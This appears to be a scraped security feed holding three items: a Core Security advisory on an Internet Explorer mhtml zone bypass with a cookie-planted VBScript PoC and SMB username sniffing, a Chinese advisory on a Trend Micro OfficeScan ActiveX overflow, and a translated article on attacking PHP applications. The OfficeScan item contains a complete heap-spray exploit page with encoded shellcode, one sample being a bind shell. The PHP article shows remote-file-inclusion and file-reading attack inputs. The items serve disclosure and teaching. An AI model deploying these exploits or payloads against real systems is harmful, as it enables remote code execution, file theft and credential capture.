ATTACK DESCRIPTION

In order to reproduce the vulnerability, follow these steps:

create a file called 'evilCookie.txt' in your cookies folder with the
following content:

/-----------
Content-Type: text/html

<HTML>
<BODY>
This text is <H1>HTML code</H1>inside your cookie
<SCRIPT language="VBScript">
With createObject("MSXML2.XMLHTTP")
.open "GET", "\\127.0.0.1\C$\boot.ini", False
.send
a = .ResponseText
End With

MsgBox a
</SCRIPT>
</BODY>
</HTML>
- -----------/

Point your IE to the following URI, replacing USERNAME with the
currently logged in user name.

/-----------

mhtml:\\127.0.0.1\C$\Documents%20and%20Settings\USERNAME\Cookies\evilCoo
kie.txt

- -----------/

The contents of your boot.ini file will be displayed in a message box
(or could be programmatically sent to a remote web site).

Note that if you reference this file in a different way than using the
UNC, the privileged VB script code (which requires local machine zone
permissions to execute) won't execute. For example, accessing the file
through the following link:

/-----------

mhtml:C:\Documents%20and%20Settings\USERNAME\Cookies\evilCookie.txt

- -----------/

will result in the file being opened and rendered, but the privileged
code will not be executed. That's because the folder containing the file
evilCookie.txt belongs to the Restricted Sites Zone.

PROOF OF CONCEPT CODE

In this PoC, with nothing but a click on a link to an evil page, the
contents of the 'boot.ini' file (located at the system root in all
Windows NT based implementations) will be read using VBScript.

In order to do so, local machine zone permissions are required. So, we
need a way to put our code inside the client's machine. We will do so by
storing our code in a cookie.

Let's assume the victim user points his browser to the following URL:

/-----------

http://example.com/evilPage

- -----------/

and this page sets their cookies with the following contents:

/-----------

Set-Cookie: Content-Type: text/html=; path=/; expires=Monday,
26-Nov-2008 12:30:00 GMT
Set-Cookie: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
Transitional//EN">=<HTML><BODY>This text is <H1>HTML code</H1>inside
your cookie <SCRIPT
language="VBScript"
src="http://example.com/evilScript.vbs"></SCRIPT></BODY></HTML><!--;
path=/; expires=Monday, 26-Nov-2008 12:30:00 GMT

- -----------/

This will result in a cookie file like:

/-----------

\Documents and settings\USERNAME\Cookies\USERNAME (at) example (dot) com [email concealed][X].txt

- -----------/

with the following contents:

/-----------

~ Content-Type: text/html

~ example.com/
~ 1536
~ 3499433472
~ 29901218
~ 484464800
~ 29901200
~ *

~ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
~ <HTML><BODY>This text is <H1>HTML code</H1>inside your cookie
<SCRIPT language="VBScript"
src="http://example.com/evilScript.vbs"></SCRIPT></BODY></HTML><!_
~ 1536
~ 3499433472
~ 29901218
~ 484464800
~ 29901200
~ *

- -----------/

The evilScript.vbs file is the one that will do the privileged job:

/-----------

~ With createObject("MSXML2.XMLHTTP")
~ .open "GET", "\\127.0.0.1\C$\boot.ini", False
~ .send
~ a = .ResponseText
~ End With

~ MsgBox a

- -----------/

With this, we now have a MIME HTML-like formatted file stored in the
client's cookies folder.

Now, by somehow guessing the victim's USERNAME, we can make a reference
to that file as follows:

/-----------

mhtml:file://Documents and
Settings/USERNAME/Cookies/USERNAME (at) example (dot) com [email concealed][X].txt

- -----------/

However, as the cookies folder belongs to the restricted sites zone, we
will not be able to take advantage of the privileged code referred
inside the cookie (that in the evilScript.vbs file).

Now if we point to the file exploiting the exposed vulnerability:

/-----------

mhtml:\\127.0.0.1\C$\Documents and
Settings\USERNAME\Cookies\USERNAME (at) example (dot) com [email concealed][X].txt

- -----------/

in spite the fact that the cookie's folder is hardcoded inside the
Restricted Security Zone, the file contents will be rendered as if they
belong to the local Intranet Security Zone, and the local boot.ini file
contents will be displayed in a message box.

Minor issues

As this file is at a different server than example, IE will prompt the
user to accept a download of the file from 127.0.0.1. In order to avoid
such prompting, we will point the file through a redirection:

/-----------

http://example.com/redirectToCookie

- -----------/

And the 'redirectToCookie' file would respond with:

/-----------

Status: 302 Found
Content-type: text/html
Location: mhtml:\\127.0.0.1\C$\Documents and
Settings\USERNAME\Cookies\USERNAME (at) example (dot) com [email concealed][X].txt

- -----------/

To get the correct username, we can take advantage of other mentioned
characteristics of Internet Explorer. As the browser is able to make SMB
requests against a webserver, if we include inside the main page (the
one which sets the cookies) some references to non-existent resources in
the example.com site, the client will attempt to establish an SMB
connection against it, from where the username (among other useful data,
such as the ciphered challenge/response) can be extracted. With this, we
can dynamically create a custom redirectToCookie file with the correct
information. Of course, the victim's machine must be able to establish
outgoing connections to the port 445 to do so.

PoC files

This proof of concept uses three files to work:

* 'PoC.pl': a PERL script which will set the cookies and shot the SMB
requests.

* 'snifSMB.pl': this script must be running in the example server. It
will be listening for SMB requests, and when they occur, it will create
a set of redirectToCookie files, attempting to cover all possibilities.

* 'PoC.htm': this page will attempt to load the cookies through the
dynamically generated redirect files.

* 'evilScript.vbs': a script file referenced by the webpage created
inside the cookie, containing the code to be executed.

These files can be downloaded from
http://www.coresecurity.com/files/attachments/CORE-2008-0103-PoC.zip
In order to make it work:

* Configure a web server supporting PERL scripts.

* Take all of these files and put them together into the web server.

* Run 'snifSMB.pl' passing your domain as parameter in a shell, for
example:

/-----------

perl snifSMB.pl example.com

- -----------/

modify 'PoC.pl' to make it set the cookie referencing the script
'example.com/evilScript.vbs ' to your own domain/path. Also replace the
variable $cookieDomain in snifSMB.pl with the name of the domain from
where the cookie is set (for example set "evil" for evil.com).

~From another computer, point your IE to 'yoursite/PoC.pl'. After five
seconds, it will automatically redirect to 'yoursite/PoC.htm' and your
'boot.ini' file should be displayed.

*Report Timeline*

. 2008-01-09: Core Security Technologies notifies Microsoft that a
vulnerability has been found in Internet Explorer. Core sends an
advisory draft with technical details and PoC files, and announces its
initial plan to publish the content on February 11th.
. 2008-01-09: Vendor acknowledges notification.
. 2008-01-09: Vendor states that it's currently investigating the
reported issue, and asks Core what it plans to publish.
. 2008-01-10: Core responds it plans to publish the submitted advisory,
and tells the vendor that it's willing to discuss the publication date.
. 2008-01-11: Vendor states that it's investigating the issue and trying
to identify which platforms are affected. Vendor was unable to reproduce
the issue on Vista using IE7.
. 2008-01-11: Core responds that the problem was tested under XP SP2,
Windows 2000 and 2003, and that Vista seems vulnerable only if Protected
Mode under IE7 is OFF.
. 2008-01-11: Vendor reports that it is working through all the affected
platforms, and that it will forward the details of the complete list.
. 2008-01-21: Vendor announces that the investigation has been
completed. The platforms identified as affected are Internet Explorer
5.01 Service Pack 4, Internet Explorer 6 on W2k3, Internet Explorer 6 on
Windows XP Service Pack2, Internet Explorer 7 on Windows XP service Pack
2. The issue is scheduled to be addressed in the April 08 Internet
Explorer Security bulletin. Vendor asks Core to delay the publication of
the advisory until a fix is released.
. 2008-01-22: Core responds that it intends to publish the advisory as
"coordinated release" when fixed versions are made available. However
external circumstances (e.g. the bug being exploited in the wild) may
force an earlier release. Core confirms that it plans to release the
Proof of Concept code sent to Microsoft with the advisory draft.
. 2008-02-29: Core asks for updated information concerning this issue.
. 2008-03-04: Vendor states that there are issues discovered with the
package that the Outlook Express team is investigating that could impact
the release date.
. 2008-03-04: Core awaits updated information.
. 2008-03-11: Vendor communicates that an April release is not looking
likely.
. 2008-03-13: Core informs the vendor that the Beta release of IE 8 is
also vulnerable, and asks for a clarification about the mention of the
Outlook Express team.
. 2008-03-13: Vendor responds that the group that manages Outlook
Express/Windows Mail is responsible for addressing this issue and owns
the code. Vendor states that it is not likely that the issue will be
addressed in April, and that the next ship date would be June.
. 2008-04-01: Core requests detailed information about the nature of the
fix, and why it is taking so long. In particular, Core inquires about
the root cause of the problem; any potential workarounds/mitigation
mechanisms; whether there is a way to exploit this problem with
Protected Mode turned ON on Vista; and why May is not a possible ship date.
. 2008-04-01: Vendor responds that the issue is planned to be addressed
in a June security update; that locking down the mhtml protocol and
disabling the handler is a possible workaround; that the involved
product team performs in-depth testing every two months and that given
the impact of security issues they prefer to take an in-depth approach
(this is why it is not possible to release the fix in May).
. 2008-05-21: Vendor informs Core that the issue will be addressed in a
June Outlook Express bulletin.
. 2008-05-21: Core requests a clarification about the technical
rationale for releasing the information as an Outlook Express bulletin
and the corresponding patches associated to Outlook Express rather than
Internet Explorer.
. 2008-05-21: Vendor responds that the code where the root cause was
found is owned and shipped by the Outlook Express/Windows Mail team; and
that Internet Explorer is just the attack vector.
. 2008-05-21: Core requests further technical clarification, since
categorizing this issue as an "Outlook Express" problem may be
misleading. Core requests a technical assessment of the concept that
Internet Explorer is just an attack vector in this case.
. 2008-06-02: Vendor informs that the necessary packages for Windows
2000 were not built; and that this delay will push the release plan back
to July.
. 2008-06-02: Core again requests technical information about the nature
and root cause of the bug. Given that Microsoft has decided not to
release the readily available patches for Windows XP, 2003 and Vista,
Core decides to re-schedule the publication of its security advisory
CORE-2008-0103 to June 11th, 2008.
. 2008-06-02: Vendor responds that the issue is in mhtml which is a
component of Outlook/Windows mail; that Internet Explorer is a vector
and not where the issue lies; that Microsoft only releases a fix when
all platforms have been addressed, since the current fix is missing for
Windows 2000, releasing it would put out customers on that platform at risk.
. 2008-06-02: Core replies that the vendor's response is still missing a
technical description and sound analysis of the problem. In particular,
mhtml is one component used in the reported attack scenario, but the
fact that scripting code can be inserted in a cookie file and the fact
that a redirect to an UNC path pointing at the localhost filesystem
makes IE transition to the Local Security Zone may or may not be a
security weakness and may or may not be related to mhtml. Core also
states that by delaying publication of the currently available patches
to users that could fix the problem immediately, the vendor is
penalizing them and maintaining them at risk unnecessarily.
. 2008-06-03: Vendor requests details of the claim that the issue can be
reproduced without OE/Mail being installed. Vendor proposes to arrange a
conference call to discuss the technical issue.
. 2008-06-03: Core responds that in fact the issue can be reproduced
after OE has been un-installed; that Core prefers to continue the
discussion by email, to keep the advisories on the loop and to properly
document communications with the vendor. Core requests a response to the
proposal that Microsoft releases the patches that are ready in the June
update and the remaining ones for Windows 2000 in July.
. 2008-06-04: Vendor states that the product team has verified the mhtml
protocol (inetcomm.dll) as the root cause, and has verified this by
deleting inetcomm.dll, which has resulted in being unable to reproduce
the issue. Due to the mhtml protocol being owned by Outlook/Windows
Mail, they are responsible for the fix. Vendor states that it will not
release the current patches and expose their Windows 2000 customers,
unless it sees active exploitation of this issue.
. 2008-06-05: Core responds that a better strategy to protect customers
is to release the official patches that are readily available and to
provide specific guidance and workarounds for use on vulnerable systems
for which there are no official patches ready; and that disabling the
mhtml protocol handler seems to be the most effective workaround.
. 2008-07-08: Vendor requests a PGP key to send a fix to be tested by Core.
. 2008-07-08: Core provides the key. Core states that Microsoft did not
release patches for any of platforms vulnerable to this problem,
although the July patch release date has already passed (which was the
previously planned date for publication indicated by MSRC on their email
from June 2nd). Given the criticality of the bug, the multiple
disconnections in the communications and Microsoft's repeated failure to
meet its own patch release dates, Core is considering to proceed with
the publication of the advisory under "user release" mode.
. 2008-07-08: Vendor communicates that the development team had recently
completed developing the fix; that although July was originally
indicated as a possible release window, the development team concluded
that extra testing would be necessary, preventing a July release; vendor
reports that if further issues are identified during the test process,
that may impact the tentative August release date.
. 2008-07-08: Core discusses the fact that passing from the Restricted
Sites zone or Internet zone to Intranet Zone or LMZ using a UNC path
should not be allowed if the same behavior is not allowed for the
non-UNC equivalent URI.
. 2008-08-08: Core requests updated information about the release date
of fixes, in particular if fixes will be issued in the August security
update.
. 2008-08-12: Microsoft Security Bulletin MS08-048 is released.
. 2008-08-13: Advisory CORE-2008-0103 is published.

*References*

[1] Microsoft Security Bulletin MS08-048
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx
[2] http://msdn2.microsoft.com/en-us/library/ms537183.aspx
[3] http://msdn2.microsoft.com/en-us/library/ms775147.aspx

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.a
sc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkijS5YACgkQyNibggitWa2QWQCfRF+fiW+V+J+aeCNHlLxctOGp
S04AoKz5UU+RxTL+92J084/mw/ovWCD+
=5p6r
-----END PGP SIGNATURE-----


]]> 2008-08-14T21:14:33Z <![CDATA[趋势科技OfficeScan OfficeScanRemoveCtrl.dll控件多个栈溢出漏洞]]> 更新日期:2008-07-29

受影响系统:
Trend Micro OfficeScan Corporate Edition 7.3 Build 1314
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30407

OfficeScan是一种针对整个网段的分布式杀毒软件。

OfficeScan的Web控制台在通过Web接口部署产品时会使用一些ActiveX控件,其中的objRemoveCtrl控件(OfficeScanRemoveCtrl.dll,CLSID为{5EFE8CB1-D095-11D1-88FC-0080C859833B})中用于显示某些属性及其值的代码存在多个栈溢出漏洞。如果用户受骗访问了恶意网页并向有漏洞的属性参数传送了超长字符串的话,就可以触发这些溢出,导致执行任意代码。

如果要利用这个漏洞,控件必须以可视的方式嵌入到网页中,也就是obj = new ActiveXObject()不会起作用。以下是有漏洞的属性:

HttpBased
LatestPatternServer
LatestPatternURL
LocalServerPort
MasterDirectory
MoreFiles
PatternFilename
ProxyLogin
ProxyPassword
ProxyPort
ProxyServer
RegistryINIFilename
Server
ServerIniFile
ServerPort
ServerSubDir
ServiceDisplayName
ServiceFilename
ServiceName
ShellExtensionFilename
ShortcutFileList
ShortcutNameList
UninstallPassword
UnloadPassword
UseProxy

<*来源:Elazar Broad (elazarb@earthlink.net)

链接:http://marc.info/?l=full-disclosure&m=121726533107741&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6 + IE7, OfficeScan 7.3 patch 4, OfficeScanRemoveCtrl.dll version 7.3.0.1020
The control is installed when you install OfficeScan through the server web console.
This was fixed in OfficeScan 8.x(uses strcpy_s which throws INVALID_PARAMETER, still crashes the browser though)
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit</title>
<script language="JavaScript" defer>
function Check() {




// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
"%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
"%u684f%u3956%u386f%u4350");


var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var slackspace = headersize + shellcode1.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new Array();
for (i = 0; i < 330; i++){ memory[i] = block + shellcode1 }

var buf = '';
while (buf.length < 1008) buf = buf + unescape("%0A%0A");

obj.Server = buf;
}
</script>


</head>
<body onload="JavaScript: return Check();">
<object classid="clsid:5EFE8CB1-D095-11D1-88FC-0080C859833B" id="obj" size="0" width="0">
Unable to create object
</object>

</body>
</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Trend Micro
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.antivirus.com/

]]> 2008-07-30T15:07:49Z <![CDATA[如何对PHP程序中的常见漏洞进行攻击]]> 由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。
文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议。
好了,废话少说,我们言归正传!

[全局变量]

PHP 中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型也不需要指定,它们会根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其 方便的处理方法。很显然,这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很 少初始化变量,毕竟,当它们第一次创建时,他们是空的。
很显然,基于PHP的应用程序的主函数一般都是接受用户的输入(主要是表单变量,上载文件和Cookie等),然后对输入数据进行处理,然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易,实际上PHP是把这些输入数据看作全局变量来处理的。
例如:
<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello">
<INPUT TYPE="SUBMIT">
</FORM>
很 显然,这会显示一个文本框和提交按钮。当用户点击提交按钮时,"test.php"会处理用户的输入,当"test.php"运行时,"$hello" 会 包含用户在文本框输入的数据。从这里我们应该看出,攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用 "test.php",而是直接在浏览器地址栏输入http://server/test.php?hello=hi&setup=no,那么, 不止是"$hello"被创建,"$setup"也被创建了。
译者注:这两种方法也就是我们通常说的"POST"和"GET"方法。
下面的用户认证代码暴露了PHP的全局变量所导致的安全问题:
<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>
上面的代码首先检查用户的密码是否为"hello",如果匹配的话,设置"$auth"为"1",即通过认证。之后如果"$suth"为"1"的话,就会显示一些重要信息。
表 面看起来是正确的,而且我们中有相当一部分人是这样做的,但是这段代码犯了想当然的错误,它假定"$auth"在没有设置值的时候是空的,却没有想到攻击 者可以创建任何全局变量并赋值,通过类似"http://server/test.php?auth=1"的方法,我们完全可以欺骗这段代码,使它相信我 们是已经认证过的。
因此,为了提高PHP程序的安全性,我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话,这可是一项非常艰巨的任务。
一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量,这依赖于我们的提交方式(GET或POST)。当PHP配置为打开"track_vars"选项的话(这是缺省值),用户提交的变量就可以在全局变量和上面提到的数组中获得。
但 是值得说明的是,PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量, HTTP_POST_VARS数组用于处理POST方式提交的变量,HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量,而对于 HTTP_POST_FILES数组(比较新的PHP才提供),则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数 组中,因此一个安全的PHP程序应该检查这四个数组。

[远程文件]

PHP是一种具有丰富特性的语言,提供了大量的函数,使编程者实现某个功能很容易。但是从安全的角度来看,功能越多,要保证它的安全性就越难,远程文件就是说明这个问题的一个很好的例子:
<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename<BR> ");
?>
上 面的脚本试图打开文件"$filename",如果失败就显示错误信息。很明显,如果我们能够指定"$filename"的话,就能利用这个脚本浏览系统 中的任何文件。但是,这个脚本还存在一个不太明显的特性,那就是它可以从任何其它WEB或FTP站点读取文件。实际上,PHP的大多数文件处理函数对远程 文件的处理是透明的。
例如:
如果指定"$filename"为"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"
则上面的代码实际上是利用主机target上的unicode漏洞,执行了dir命令。
这使得支持远程文件的include(),require(),include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容,并且把它们按照PHP代码解释,主要是用在库文件上。
例如:
<?php
include($libdir . "/languages.php");
?>
上 例中"$libdir"一般是一个在执行代码前已经设置好的路径,如果攻击者能够使得"$libdir"没有被设置的话,那么他就可以改变这个路径。但是 攻击者并不能做任何事情,因为他们只能在他们指定的路径中访问文件languages.php(perl中的"Poison null byte"攻击对PHP没有作用)。但是由于有了对远程文件的支持,攻击者就可以做任何事情。例如,攻击者可以在某台服务器上放一个文件 languages.php,包含如下内容:
<?php
passthru("/bin/ls /etc");
?>
然后把"$libdir"设置为"http://<evilhost>/",这样我们就可以在目标主机上执行上面的攻击代码,"/etc"目录的内容作为结果返回到客户的浏览器中。
需要注意的是,攻击服务器(也就是evilhost)应该不能执行PHP代码,否则攻击代码会在攻击服务器,而不是目标服务器执行,如果你想了解具体的技术细节,请参考:http://www.securereality.com.au/sradv00006.txt

[文件上载]

PHP自动支持基于RFC 1867的文件上载,我们看下面的例子:
<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="hello">
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
<INPUT TYPE="SUBMIT">
</FORM>
上 面的代码让用户从本地机器选择一个文件,当点击提交后,文件就会被上载到服务器。这显然是很有用的功能,但是PHP的响应方式使这项功能变的不安全。当 PHP第一次接到这种请求,甚至在它开始解析被调用的PHP代码之前,它会先接受远程用户的文件,检查文件的长度是否超过 "$MAX_FILE_SIZE variable"定义的值,如果通过这些测试的话,文件就会被存在本地的一个临时目录中。
因此,攻击者可以发送任意文件给运行PHP的主机,在PHP程序还没有决定是否接受文件上载时,文件已经被存在服务器上了。
这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。
让 我们考虑一下处理文件上载的PHP程序,正如我们上面说的,文件被接收并且存在服务器上(位置是在配置文件中指定的,一般是/tmp),扩展名一般是随机 的,类似"phpxXuoXG"的形式。PHP程序需要上载文件的信息以便处理它,这可以通过两种方式,一种方式是在PHP 3中已经使用的,另一种是在我们对以前的方法提出安全公告后引入的。
但是,我们可以肯定的说,问题还是存在的,大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件,比如说上面的例子:
$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g "c: emphello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")
然后PHP程序开始处理根据"$hello"指定的文件,问题在于"$hello"不一定是一个PHP设置的变量,任何远程用户都可以指定它。如果我们使用下面的方式:
http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt
就导致了下面的PHP全局变量(当然POST方式也可以(甚至是Cookie)):
$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"
上面的表单数据正好满足了PHP程序所期望的变量,但是这时PHP程序不再处理上载的文件,而是处理"/etc/passwd"(通常会导致内容暴露)。这种攻击可以用于暴露任何敏感文件的内容。
我 在前面已经说了,新版本的PHP使用HTTP_POST_FILES[]来决定上载文件,同时也提供了很多函数来解决这个问题,例如有一个函数用来判断某 个文件是不是实际上载的文件。这些函数很好的解决了这个问题,但是实际上肯定有很多PHP程序仍然使用旧的方法,很容易受到这种攻击。
作为文件上载的攻击方法的一个变种,我们看一下下面的一段代码:
<?php
if (file_exists($theme)) // Checks the file exists on the local system (no remote files)
include("$theme");
?>
如 果攻击者可以控制"$theme"的话,很显然它可以利用"$theme"来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令, 但是他无法使用远程文件,因此,他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的,但是文件上载帮了我们这个忙,如果攻击者先在本地 机器上创建一个包含PHP代码的文件,然后创建一个包含名为"theme"的文件域的表单,最后用这个表单通过文件上载把创建的包含PHP代码的文件提交 给上面的代码,PHP就会把攻击者提交的文件保存起来,并把"$theme"的值设置为攻击者提交的文件,这样file_exists()函数会检查通 过,攻击者的代码也将执行。
